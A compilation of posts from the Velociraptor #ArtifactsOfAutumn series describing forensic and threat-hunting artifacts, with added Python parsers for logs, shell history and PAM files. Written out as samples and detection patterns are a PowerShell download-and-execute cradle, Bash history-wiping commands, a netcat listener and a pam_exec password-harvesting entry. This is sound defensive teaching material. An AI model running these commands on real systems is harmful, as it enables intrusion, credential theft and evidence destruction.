@velocidex Thanks, and agreed! I'm planning on getting the posts into a central location soon. Right now, folks can find them via the #ArtifactsOfAutumn tag.
🦖Day 92 (THE LAST DAY!) of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Windows.EventLogs.WonkaVision
Link: https://docs.velociraptor.app/exchange/artifacts/pages/windows.eventlogs.wonkavision
----
WonkaVision is a proof-of-concept (POC) tool, created by @exploitph and @4ndr3w6S, that analyzes Kerberos tickets and attempts to determine whether they are forged (e.g. a #GoldenTicket).
https://github.com/0xe7/WonkaVision
Presentation:
https://github.com/0xe7/Talks/blob/main/Andrew_Charlie_SANS_Hackfest_2022_revised.pdf
----
This artifact can run WonkaVision, then collect its generated Windows event logs. From the event logs, we can detect potentially forged Kerberos tickets.
----
This concludes the #ArtifactsOfAutumn. Hope you enjoyed it, and thanks for all of the support!
#velociraptor #artifactsofautumn #goldenticket #dfir #forensics #infosec #threathunting #wonkavision
🦖Day 91 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.IRIS.Sync.Asset
Author: @StephMikiss
Link: https://docs.velociraptor.app/exchange/artifacts/pages/iris.sync.asset
----
This artifact synchronizes clients from Velociraptor to DFIR-IRIS (https://dfir-iris.org/). It parses the available client information, such as network interfaces, IP addresses, asset type and applied labels.
----
For those unfamiliar with DFIR-IRIS (@dfir_iris), it is a free, open source incident response platform that includes a host of useful and innovative features even many commercial platforms don't possess. Check it out using the link above!
----
Once a client has been added to DFIR-IRIS, the asset ID from DFIR-IRIS is added as client metadata and 'IRIS' is added as a label.
If a client already has an asset ID, the asset is updated; in general, labels and the compromised status are synchronized.
----
This artifact is very powerful due to the fact that we can quickly add clients to DFIR-IRIS from Velociraptor with very little effort.
This means that we can spend less time on managerial tasks, and more time on investigating and remediating the hosts we deem compromised.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
#velociraptor #artifactsofautumn #dfir #forensics #infosec #iris #threathunting
🦖Day 90 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.MacOS.UnifiedLogHunter
Link:
https://docs.velociraptor.app/exchange/artifacts/pages/macos.unifiedloghunter
----
With macOS 10.12 (Sierra) came a new way to log system events in a more centralized, unified fashion -- Unified Logs.
These logs can be of great importance to investigators searching for artifacts of adversary activity.
----
@crowdstrike , @Mandiant, and others have done a great job covering the usefulness and technical details surrounding the Unified Logging system.
https://www.crowdstrike.com/blog/how-to-leverage-apple-unified-log-for-incident-response/
https://www.mandiant.com/resources/blog/reviewing-macos-unified-logs
----
This artifact is a wrapper around the 'log' command, allowing defenders to easily review events from the logs from the many subsystems of the Unified Logging infrastructure.
It provides the ability to search using a custom or pre-defined filter, and is great for live hunting.
----
If you are looking to collect only raw files and parse them later, or for a third party tool to process the data, check out the Exchange.MacOS.UnifiedLogParser artifact.
https://docs.velociraptor.app/exchange/artifacts/pages/macos.unifiedlogparser/
----
The information provided by this artifact includes:
- Event time/message/type
- Message type
- Category
- Subsystem
- PID
- Process image Path/UUID
- Sender image Path/UUID
- Sender program counter
- Activity ID
- Parent activity ID
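Added example (my own Python, not code from the artifact or from the post above): the same kind of hunt run offline over a constructed 'log show --style json' export, so the filtering logic can be exercised on a non-Mac analysis box. The JSON key names and the three pre-defined filters are my assumptions; confirm the keys against a real export before relying on them.

```python
import json
import re
from typing import Callable, Dict, List, Optional

# Normalized columns, matching the fields the artifact reports.
FIELDS = [
    "timestamp", "eventMessage", "eventType", "messageType", "category",
    "subsystem", "processID", "processImagePath", "processImageUUID",
    "senderImagePath", "senderImageUUID", "senderProgramCounter",
    "activityIdentifier", "parentActivityIdentifier",
]


def _event(**overrides) -> dict:
    """Build one constructed log record with every field present."""
    base = {f: "" for f in FIELDS}
    base.update(eventType="logEvent", messageType="Default", processID=0,
                senderProgramCounter=0, activityIdentifier=0, parentActivityIdentifier=0)
    base.update(overrides)
    return base


# Constructed sample of `log show --style json` output (not a real capture).
# Assumption: the key names in FIELDS follow what `log show --style json` emits.
SAMPLE_LOG_JSON = json.dumps([
    _event(timestamp="2022-12-01 09:14:02.117123-0500", processID=4412,
           processImagePath="/usr/sbin/sshd", senderImagePath="/usr/sbin/sshd",
           eventMessage="Accepted publickey for pbeesly from 10.10.20.5 port 51522 ssh2: ED25519 SHA256:abcd"),
    _event(timestamp="2022-12-01 09:15:40.550001-0500", processID=4490,
           processImagePath="/usr/bin/sudo", senderImagePath="/usr/bin/sudo",
           eventMessage="pbeesly : TTY=ttys001 ; PWD=/Users/pbeesly ; USER=root ; "
                        "COMMAND=/bin/launchctl load /Library/LaunchDaemons/com.example.updater.plist"),
    _event(timestamp="2022-12-01 09:16:03.000100-0500", processID=118,
           subsystem="com.apple.securityd", category="keychain",
           processImagePath="/usr/libexec/securityd", senderImagePath="/usr/libexec/securityd",
           eventMessage="keychain unlock requested by /usr/bin/security"),
    _event(timestamp="2022-12-01 09:20:00.000000-0500", processID=903,
           subsystem="com.apple.TimeMachine", category="General",
           processImagePath="/System/Library/CoreServices/backupd.bundle/Contents/Resources/backupd",
           senderImagePath="/System/Library/CoreServices/backupd.bundle/Contents/Resources/backupd",
           eventMessage="Completed backup: 2022-12-01-092000.backup"),
])

# Pre-defined filters, written as Python callables instead of `log` predicate
# strings (my own equivalents, not the artifact's built-in filter list).
PREDEFINED_FILTERS: Dict[str, Callable[[dict], bool]] = {
    # SSH logins accepted by sshd.
    "ssh_accepted": lambda e: e.get("processImagePath", "").endswith("/sshd")
                              and e.get("eventMessage", "").startswith("Accepted "),
    # Commands elevated through sudo.
    "sudo_commands": lambda e: e.get("processImagePath", "").endswith("/sudo")
                               and "COMMAND=" in e.get("eventMessage", ""),
    # Any message touching LaunchAgents/LaunchDaemons, whatever the process.
    "launch_items": lambda e: re.search(r"/Library/Launch(Agents|Daemons)/",
                                        e.get("eventMessage", "")) is not None,
}


def hunt(log_json: str, filter_name: Optional[str] = None,
         message_regex: Optional[str] = None) -> List[dict]:
    """Return normalized rows for the events that pass the chosen filters.

    filter_name selects a pre-defined filter; message_regex is a custom,
    case-insensitive regex over eventMessage. Both apply when both are given.
    """
    if filter_name is not None and filter_name not in PREDEFINED_FILTERS:
        raise ValueError(f"unknown filter {filter_name!r}; "
                         f"choose from {sorted(PREDEFINED_FILTERS)}")
    predicate = PREDEFINED_FILTERS.get(filter_name) if filter_name else None
    pattern = re.compile(message_regex, re.IGNORECASE) if message_regex else None
    rows = []
    for event in json.loads(log_json):
        if predicate and not predicate(event):
            continue
        if pattern and not pattern.search(event.get("eventMessage", "")):
            continue
        rows.append({field: event.get(field) for field in FIELDS})
    return rows


if __name__ == "__main__":
    for row in hunt(SAMPLE_LOG_JSON, filter_name="sudo_commands"):
        print(row["timestamp"], row["processImagePath"], row["eventMessage"])
```

On a live Mac the input would come from 'log show --style json' (optionally narrowed with --predicate and --last); the point here is that the normalization and filtering are separable from the collection step.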
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
#velociraptor #artifactsofautumn #dfir #forensics #infosec #macos #threathunting #unifiedlogs
@r34p3r @velocidex @mgreen27 @svch0st This is the 89th entry in the series 😀. All of the entries should be accessible using the #ArtifactsOfAutumn tag (here, and previously on Twitter). I plan on compiling them into a single resource at some point after the end of the series.
🦖Day 89 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Server.Import.DetectRaptor
Author: @mgreen27, with content references to @svch0st and #Sigma.
Link: https://docs.velociraptor.app/exchange/artifacts/pages/detectraptor
----
DetectRaptor is a collection of publicly available Velociraptor detection content. Most content is managed by a series of CSV files and artifacts are automatically updated.
https://github.com/mgreen27/DetectRaptor
This artifact will import the latest DetectRaptor bundle into the current server.
----
DetectRaptor currently includes the following artifacts:
Windows.Detection.Applications
Windows.Detection.BinaryRename
Windows.Detection.Evtx
Windows.Detection.MFT
Windows.Detection.NamedPipes
Windows.Detection.Webhistory
Windows.Detection.ZoneIdentifier
Server.StartHunts
----
Most of these artifacts contain content in CSV files that provide for bulk detection capability.
The CSVs can be updated as needed to add new detections.
The artifacts are generated from a VQL template, and the associated CSV via their own Python script.
----
The Server.StartHunts artifact is useful for kicking off hunts for the artifacts within the DetectRaptor bundle.
We can leverage the DetectRaptor bundle in a hunt or single client collection to cast a wide net, then review detection hits for items of interest.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
#velociraptor #artifactsofautumn #sigma #dfir #forensics #infosec #threathunting
🦖Day 88 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Linux.System.BashLogout
Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.system.bashlogout
----
This artifact captures information about Bash logout files for examination of abnormal activity.
Bash logout files are used to run certain commands upon user logout, such as clearing the shell or terminal state.
----
An adversary could leverage this capability to cover their tracks by clearing logs, deleting files, etc.
One example of this is running the following commands at logout to clear the user's Bash history:
'history -c'
'cat /dev/null > ~/.bash_history'
https://attack.mitre.org/techniques/T1070/003/
----
This artifact also includes a content filter ('ContentFilter') to allow for searching for various content within the file.
Additionally, in-scope Bash logout files can be uploaded to the Velociraptor server by checking the box for the 'UploadFiles' option.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
#velociraptor #artifactsofautumn #dfir #forensics #infosec #linux #t1070 #threathunting
🦖Day 87 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Server.Enrichment.OpenAI
Link: https://docs.velociraptor.app/exchange/artifacts/pages/server.enrichment.openai
----
Have you been enamored with all of the talk of #ChatGPT and #OpenAI, and how it could potentially assist defenders during detection engineering, incident response, or threat hunting?
Now you can experiment with integration of this functionality into Velociraptor!
----
This artifact allows for enrichment of results by querying the OpenAI API.
It leverages the 'text-davinci-003' language model by default, although the model is configurable.
The maximum number of tokens is also configurable, which can affect the response provided by OpenAI.
----
The intention of this artifact is to enrich results from other artifacts, although, it can be used on its own as well.
In one example, we ask if a command line value ('nc -l 1337') is suspicious. 🔍
In another example, we ask about the best features of Velociraptor🦖😃
----
NOTE: You may want to be careful providing sensitive information to OpenAI. However, this artifact can still be used to experiment with potential analysis and investigation improvements. With great power comes great responsibility! 🕷️🕸️
READ:
https://help.openai.com/en/articles/5722486-how-your-data-is-used-to-improve-model-performance
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
#velociraptor #artifactsofautumn #chatgpt #openai #dfir #forensics #infosec #threathunting
🦖Day 86 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows.Memory.Acquisition
Link: https://docs.velociraptor.app/artifact_references/pages/windows.memory.acquisition
----
This artifact leverages Winpmem to acquire a full memory image of the endpoint.
While it is ideal to process and filter data as quickly as possible on the endpoint, in certain instances it may still be beneficial or necessary to obtain a copy of the endpoint's physical memory.
----
This artifact could also be used in conjunction with the offline collector to obtain a memory image with a triage binary as opposed to requiring a client to be connected to the Velociraptor server.
The image could then be processed with your favorite memory analysis framework.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
#velociraptor #artifactsofautumn #dfir #forensics #infosec #MemoryForensics
🦖Day 85 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.MacOS.Applications.Notes
Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.applications.notes
----
This artifact provides details about notes taken using the default Notes application on macOS.
These notes can be useful during an investigation, especially if tied to interesting files.
Deleted notes and attachments can also be recovered in some instances.
----
The information provided by this artifact includes:
- User that created the note
- Note ID/title/text
- Note creation time
- Note modification time
- Note last opened time
- Note folder ID/location
- Attachment name/size/UUID
Attachments can also be uploaded, if desired.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you want to learn more about the macOS Notes database, check out Yogesh Khatri's blog article using the link below!
http://www.swiftforensics.com/2018/02/reading-notes-database-on-macos.html
#velociraptor #artifactsofautumn #dfir #forensics #infosec #macos #threathunting
🦖Day 84 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows.NTFS.ADSHunter
Author: @mgreen27
Link:
https://docs.velociraptor.app/artifact_references/pages/windows.ntfs.adshunter
----
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every NTFS partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition.
Within MFT entries are file attributes, such as Extended Attributes (EA) and Alternate Data Streams (ADSs), which exist when more than one Data attribute is present. A stream can be used to store arbitrary data (even complete files).
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.
https://attack.mitre.org/techniques/T1564/004/
----
BitPaymer, a ransomware variant, has been known to leverage ADSs by copying itself to an ADS called ':bin', then creating a process from the stream.
https://attack.mitre.org/software/S0570/
----
This artifact hunts for alternate data streams using a variety of options for targeting, including:
- Directory
- ADS name (inclusion or exclusion)
- ADS Content
- Minimum content size
- Maximum content size
Once found, a stream can also be uploaded to the Velociraptor server.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you would like to experiment with ADSs for yourself, check out the link to the associated Atomic Red Team tests below!
#velociraptor #artifactsofautumn #dfir #forensics #infosec #t1564 #threathunting #windows
🦖Day 83 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Server.Utils.BackupGCS/S3
Link:
https://docs.velociraptor.app/artifact_references/pages/server.utils.backupgcs/
https://docs.velociraptor.app/artifact_references/pages/server.utils.backups3/
----
These artifacts are server monitoring artifacts that will watch for flow completions, then zip and send the results to Google Cloud, or an S3 bucket, using the 'upload_gcs()' and 'upload_s3()' functions.
https://docs.velociraptor.app/vql_reference/plugin/upload_gcs
https://docs.velociraptor.app/vql_reference/plugin/upload_s3
----
Once uploaded, the collections can be left alone and remain archived, or special post-processing can be applied using third-party tools, depending on defenders' needs.
@eric_capuano and @shortxstack (@recon_infosec) did an excellent job presenting about using these artifacts with Timesketch to generate a timeline of events.
If you haven't already, be sure to check out their presentation from @SANS #DFIR Summit 2021!
https://www.sans.org/presentations/breaches-be-crazy/
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
#velociraptor #artifactsofautumn #dfir #forensics #infosec #plaso #threathunting #Timesketch
🦖Day 82 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Linux.Forensics.RecentlyUsed
Author: @rxurien
Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.forensics.recentlyused
----
For GNOME-based desktop environments, the '.local/share/recently-used.xbel' file located under each user's home directory can provide valuable information during an investigation, such as a list of recent files accessed by applications, as well as a source of download history.
----
This artifact uses the parse_xml() function to parse the XML-based 'recently-used.xbel' file.
https://docs.velociraptor.app/vql_reference/parsers/parse_xml
----
The information provided by this artifact includes:
- Associated user
- File that was referenced by the application
- Time added, modified, and last visited
- MIME Type
- Application name and CLI arguments/parameters
- Relevant 'recently-used.xbel' file
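Added example (my own Python, not code from the artifact or from the post above): a stand-alone parser for 'recently-used.xbel' that produces the same row shape as the output list above, one row per file/application pair. The sample file is constructed for this example and the user attribution rule (/home/<user>/ or /root/) is my assumption.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Optional
from urllib.parse import unquote, urlparse

# Constructed sample recently-used.xbel (not from a real host). The layout follows
# the freedesktop.org desktop-bookmarks format that GTK applications write.
SAMPLE_XBEL = """<?xml version="1.0" encoding="UTF-8"?>
<xbel version="1.0"
      xmlns:bookmark="http://www.freedesktop.org/standards/desktop-bookmarks"
      xmlns:mime="http://www.freedesktop.org/standards/shared-mime-info"
>
  <bookmark href="file:///home/pbeesly/Downloads/invoice.pdf" added="2022-11-30T14:02:11.123456Z" modified="2022-11-30T14:02:11.123456Z" visited="2022-11-30T14:02:11.123456Z">
    <info>
      <metadata owner="http://freedesktop.org">
        <mime:mime-type type="application/pdf"/>
        <bookmark:applications>
          <bookmark:application name="Firefox" exec="&apos;firefox %u&apos;" modified="2022-11-30T14:02:11.123456Z" count="1"/>
        </bookmark:applications>
      </metadata>
    </info>
  </bookmark>
  <bookmark href="file:///home/pbeesly/Downloads/payroll%20export.sh" added="2022-11-30T14:05:00.000000Z" modified="2022-11-30T14:06:30.000000Z" visited="2022-11-30T14:06:30.000000Z">
    <info>
      <metadata owner="http://freedesktop.org">
        <mime:mime-type type="application/x-shellscript"/>
        <bookmark:applications>
          <bookmark:application name="Firefox" exec="&apos;firefox %u&apos;" modified="2022-11-30T14:05:00.000000Z" count="1"/>
          <bookmark:application name="gedit" exec="&apos;gedit %u&apos;" modified="2022-11-30T14:06:30.000000Z" count="2"/>
        </bookmark:applications>
      </metadata>
    </info>
  </bookmark>
</xbel>
"""
SAMPLE_PATH = "/home/pbeesly/.local/share/recently-used.xbel"

NS = {
    "bookmark": "http://www.freedesktop.org/standards/desktop-bookmarks",
    "mime": "http://www.freedesktop.org/standards/shared-mime-info",
}


def user_from_path(path: str) -> Optional[str]:
    """Attribute the file to a user from /home/<user>/... or /root/... (assumed layout)."""
    m = re.match(r"^/home/([^/]+)/", path) or re.match(r"^/(root)/", path)
    return m.group(1) if m else None


def href_to_path(href: str) -> str:
    """Turn a file:// href into a local path, decoding %XX escapes such as %20."""
    parsed = urlparse(href)
    return unquote(parsed.path) if parsed.scheme == "file" else href


def parse_recently_used(xml_text: str, source_path: str) -> List[dict]:
    """One row per (bookmark, application) pair, like the artifact's output."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    user = user_from_path(source_path)
    rows = []
    for bm in root.findall("bookmark"):
        mime_el = bm.find("info/metadata/mime:mime-type", NS)
        base = {
            "User": user,
            "Path": href_to_path(bm.get("href", "")),
            "Added": bm.get("added"),
            "Modified": bm.get("modified"),
            "Visited": bm.get("visited"),
            "MimeType": mime_el.get("type") if mime_el is not None else None,
            "SourceFile": source_path,
        }
        apps = bm.findall("info/metadata/bookmark:applications/bookmark:application", NS)
        if not apps:
            # Keep the access visible even when no application recorded itself.
            rows.append({**base, "Application": None, "Exec": None, "Count": None, "AppModified": None})
        for app in apps:
            rows.append({**base, "Application": app.get("name"), "Exec": app.get("exec"),
                         "Count": int(app.get("count", "0")), "AppModified": app.get("modified")})
    return rows


if __name__ == "__main__":
    for row in parse_recently_used(SAMPLE_XBEL, SAMPLE_PATH):
        print(row["User"], row["Visited"], row["Application"], row["Path"])
```

The second bookmark shows why the per-application split matters: a downloaded script first registered by the browser and then opened by an editor is a different story from one that was only downloaded.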
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you would like to learn more about this technique and others, check out the links below!
#velociraptor #artifactsofautumn #dfir #forensics #infosec #linux #threathunting
🦖Day 81 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows.Persistence.PowershellRegistry
Link: https://docs.velociraptor.app/artifact_references/pages/windows.persistence.powershellregistry
----
A common way of persistence is to install a hook into a user profile registry hive, using PowerShell. When the user logs in, the PowerShell script downloads a payload and executes it.
https://attack.mitre.org/techniques/T1112/
https://attack.mitre.org/techniques/T1547/001/
----
This artifact searches user registry hives for signatures related to general PowerShell execution.
A YARA signature is used to scan the user's profile hive, which is read using raw NTFS parsing in case the user is currently logged on and the hive is locked.
----
Once detected, a row is returned and the registry hive is uploaded to the Velociraptor server.
In the provided images, we can see an example using mshta.exe to execute code.
https://redcanary.com/threat-detection-report/techniques/mshta
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you would like to learn more about this technique and others, check out the link below, as well as its references!
#velociraptor #artifactsofautumn #dfir #forensics #infosec #powershell #threathunting #windows
🦖Day 80 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.MacOS.Network.DHCP
Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.network.dhcp
----
It can be useful to view DHCP lease information on an endpoint.
If the lease length, DHCP server IP address, SSID, or other configuration details are not as expected, it could potentially indicate a rogue DHCP server on the network, or just misconfiguration.
Either way, the information provided by this artifact can be used to help defenders find unexpected DHCP lease configuration, or associate a device and interface to an IP address.
----
The information provided by this artifact includes:
- Which interfaces are using a DHCP lease
- Last modified time of the interface lease file
- Full path to the lease file
- DHCP server address
- SSID
- Assigned IP address
- Lease length
- Lease start date
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you would like to learn about DHCP-based attacks, such as DHCP spoofing, check out the MITRE ATT&CK article using the link below!
https://attack.mitre.org/techniques/T1557/003/
#velociraptor #artifactsofautumn #dfir #forensics #infosec #macos #threathunting
🦖Day 79 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Server.Utils.ImportCollection
Link: https://docs.velociraptor.app/artifact_references/pages/server.utils.importcollection
----
Velociraptor's offline collector feature is an excellent capability to have when dropping into client environments with little to no previous infrastructure, or when triaging systems that are not easily or immediately connected to a corporate network.
----
Users can leverage the offline collector wizard (which uses the Server.Utils.CreateCollector artifact) to quickly create a base collector binary, packed with all of the necessary artifacts and tools for their standard host triage.
From there, defenders simply run the binary and an encrypted ZIP file containing the collection results is created.
Until recently, this ZIP file could only be encrypted with a password, which was not ideal, as the password had to be embedded inside the collector configuration.
This meant that anyone with access to the collector binary could recover the password. There have recently been great improvements to the collector, including PKI support: an X.509 certificate (the Velociraptor server's by default) or a public key can now be used to encrypt the ZIP file.
----
What this means is that only the holder of the matching private key (the server, by default) can decrypt the ZIP file, and we can now import encrypted collections automatically, without specifying any password.
Simply point to the encrypted collection ZIP file from the Server.Utils.ImportCollection artifact!
Once imported, we can review the results within the GUI, just like a typical collection.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you would like to learn more about the improvements to the offline collections, check out the link below!
https://docs.velociraptor.app/blog/2022/2022-11-21-release-notes/#the-offline-collection-and-encryption
#velociraptor #artifactsofautumn #dfir #forensics #infosec #threathunting
🦖Day 78 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows.System.PowerShell.PSReadline
Author: @mgreen27
Link: https://docs.velociraptor.app/artifact_references/pages/windows.system.powershell.psreadline/
----
Adversaries may abuse PowerShell commands and scripts for execution.
In fact, PowerShell is commonly used by attackers across all stages of the attack lifecycle.
They can use PowerShell to perform a number of actions, including discovery of information and execution of code.
----
This artifact searches and extracts lines from the PSReadline history file.
The PSReadline module is responsible for command history and, from PowerShell 5 on Windows 10, the default configuration saves a copy of the console history to disk.
----
The following parameters are available for use with this artifact:
'SearchStrings' - regex search over a PSReadline line
'StringWhiteList' - regex whitelist for results
'UserRegex' - regex search on username
'UploadFiles' - upload in-scope ConsoleHost_history.txt files
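Added example (my own Python, not the artifact's VQL): the same four-parameter search applied offline to a ConsoleHost_history.txt, with one addition the artifact's output list above does not mention: when a hit carries a -EncodedCommand (or one of its accepted abbreviations), the base64/UTF-16LE payload is decoded alongside the raw line. The history contents, the default search pattern and the user-from-path rule are constructed for this example.

```python
import base64
import re
from typing import List, Optional

SAMPLE_PATH = (r"C:\Users\pbeesly\AppData\Roaming\Microsoft\Windows\PowerShell"
               r"\PSReadLine\ConsoleHost_history.txt")

# Constructed sample ConsoleHost_history.txt (not a real capture). The fourth
# command carries a -EncodedCommand payload generated right here so that the
# decoder below has something to unwrap.
_ENCODED = base64.b64encode('Write-Host "hello"'.encode("utf-16-le")).decode("ascii")
SAMPLE_HISTORY = "\n".join([
    "Get-Process",
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/Default_File_Path.ps1')",
    r"Get-ChildItem C:\Users",
    f"powershell -nop -w hidden -enc {_ENCODED}",
    r"Set-Location C:\Windows\Temp",
])

# Default SearchStrings-style pattern (my choice): common download cradles plus
# the abbreviations PowerShell accepts for -EncodedCommand (any unambiguous prefix).
DEFAULT_SEARCH = (r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b"
                  r"|Invoke-Expression|-(?:e|ec|en|enc|encodedcommand)\s")
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
USER_RE = re.compile(r"\\Users\\([^\\]+)\\", re.IGNORECASE)


def user_from_history_path(path: str) -> Optional[str]:
    """Derive the account from ...\\Users\\<name>\\... in the history file path."""
    m = USER_RE.search(path)
    return m.group(1) if m else None


def decode_encoded_command(line: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text), or None."""
    m = ENCODED_RE.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def search_history(history_text: str, search_strings: str = DEFAULT_SEARCH,
                   whitelist: Optional[str] = None, path: Optional[str] = None) -> List[dict]:
    """Mirror the artifact's parameters: regex search, regex whitelist, user from the path."""
    search_re = re.compile(search_strings, re.IGNORECASE)
    white_re = re.compile(whitelist, re.IGNORECASE) if whitelist else None
    user = user_from_history_path(path) if path else None
    rows = []
    for lineno, line in enumerate(history_text.splitlines(), start=1):
        if not search_re.search(line):
            continue
        if white_re and white_re.search(line):
            continue
        rows.append({"User": user, "LineNumber": lineno, "Line": line,
                     "DecodedCommand": decode_encoded_command(line), "Path": path})
    return rows


if __name__ == "__main__":
    for row in search_history(SAMPLE_HISTORY, path=SAMPLE_PATH):
        print(row["LineNumber"], row["User"], row["Line"])
        if row["DecodedCommand"]:
            print("   decoded:", row["DecodedCommand"])
```

The whitelist is applied to the raw line, not the decoded payload, so a whitelisted wrapper such as a known admin script still surfaces if it is launched with an encoded command you have not seen before.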
----
Here (image), we can see multiple attempts to download and execute a .ps1 file using 'Net.WebClient' through PowerShell.
Our view into the source of 'Default_File_Path.ps1' and what it does is somewhat hindered, but we can see that the bit.ly URL contains the text 'L3g1tCrad1e'.
----
If we were to look at what originally happened during the PowerShell session, we would see that in each instance, the Default_File_Path.ps1 file was downloaded and executed 👀
----
These commands were not necessarily malicious, but used for illustrative purposes. If you would like to test these commands for yourself, check out the Atomic Red Team test using the link below!
----
Overall, this artifact includes the following information about the PowerShell console history file:
- Last modified time and other timestamps
- Line number
- Line (commands that were run)
- User
- Path to the PowerShell console history file
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the MITRE ATT&CK page for 'Command and Scripting Interpreter: PowerShell' below!
https://attack.mitre.org/techniques/T1059/001/
#velociraptor #artifactsofautumn #dfir #forensics #infosec #windows #t1059 #threathunting
🦖Day 77 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Linux.System.PAM
Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.system.pam
----
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts.
PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services.
----
Malicious modifications to PAM may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plaintext (PAM does not store passwords).
----
This artifact uses the parse_lines() plugin to parse the files within the '/etc/pam.d/' directory so that investigators can quickly filter and review the results for relevant or suspicious entries. The 'RecordFilter' parameter can be used to look for specific patterns or strings.
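Added example (my own Python, not the artifact's VQL): a pam.d parser that goes one step past raw lines by splitting each entry into type, control, module and arguments, honouring bracketed control fields like '[success=1 default=ignore]', and attaching a reason when an entry matches the two abuse patterns this post is about: pam_exec (especially with expose_authtok, which hands the module the password on stdin) and a 'sufficient' pam_succeed_if/pam_permit in an auth stack. The sample files and the flagging rules are constructed for this example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample /etc/pam.d/ contents (not from a real host). common-auth is
# the stock Debian stack plus one injected pam_exec line; su-l carries a
# pam_succeed_if entry of the kind this artifact is meant to surface.
SAMPLE_PAM_D: Dict[str, str] = {
    "/etc/pam.d/common-auth": """\
# /etc/pam.d/common-auth - authentication settings common to all services
auth\t[success=1 default=ignore]\tpam_unix.so nullok
auth\trequisite\t\t\tpam_deny.so
auth\trequired\t\t\tpam_permit.so
auth\toptional\t\t\tpam_exec.so expose_authtok /usr/local/bin/toomanysecrets.sh
""",
    "/etc/pam.d/su-l": """\
auth  sufficient  pam_succeed_if.so uid >= 1000
auth  include     su
""",
    "/etc/pam.d/sshd": """\
@include common-auth
account    required     pam_nologin.so
""",
}

# type, control (a keyword or a [bracketed] action list), module, optional args
_ENTRY_RE = re.compile(r"^(\S+)\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")


def flag_entry(entry: dict) -> List[str]:
    """Reasons an entry deserves a closer look (empty list when none)."""
    flags = []
    module, args = entry["Module"], entry["Args"]
    if module == "pam_exec.so":
        reason = "pam_exec runs an external program during authentication"
        if "expose_authtok" in args:
            reason += " and receives the password on stdin (expose_authtok)"
        flags.append(reason)
    if (entry["Type"] == "auth" and entry["Control"] == "sufficient"
            and module in ("pam_succeed_if.so", "pam_permit.so")):
        flags.append(f"{module} as a sufficient auth module can satisfy the stack without a password")
    return flags


def parse_pam_d(files: Dict[str, str], record_filter: Optional[str] = None) -> List[dict]:
    """Parse pam.d files into rows; record_filter is a regex applied to each raw line."""
    pattern = re.compile(record_filter) if record_filter else None
    rows = []
    for path, content in files.items():
        for lineno, raw in enumerate(content.splitlines(), start=1):
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            if pattern and not pattern.search(line):
                continue
            if line.startswith("@include"):
                parts = line.split(None, 1)
                entry = {"Type": "@include", "Control": "",
                         "Module": parts[1] if len(parts) > 1 else "", "Args": ""}
            else:
                m = _ENTRY_RE.match(line)
                if m:
                    entry = dict(zip(("Type", "Control", "Module", "Args"), m.groups()))
                else:
                    # Keep unparseable lines visible instead of silently dropping them.
                    entry = {"Type": "unparsed", "Control": "", "Module": "", "Args": line}
            entry.update(File=path, LineNumber=lineno, Command=line)
            entry["Flags"] = flag_entry(entry)
            rows.append(entry)
    return rows


if __name__ == "__main__":
    for row in parse_pam_d(SAMPLE_PAM_D):
        marker = "!!" if row["Flags"] else "  "
        print(marker, row["File"], row["LineNumber"], row["Command"], "; ".join(row["Flags"]))
```

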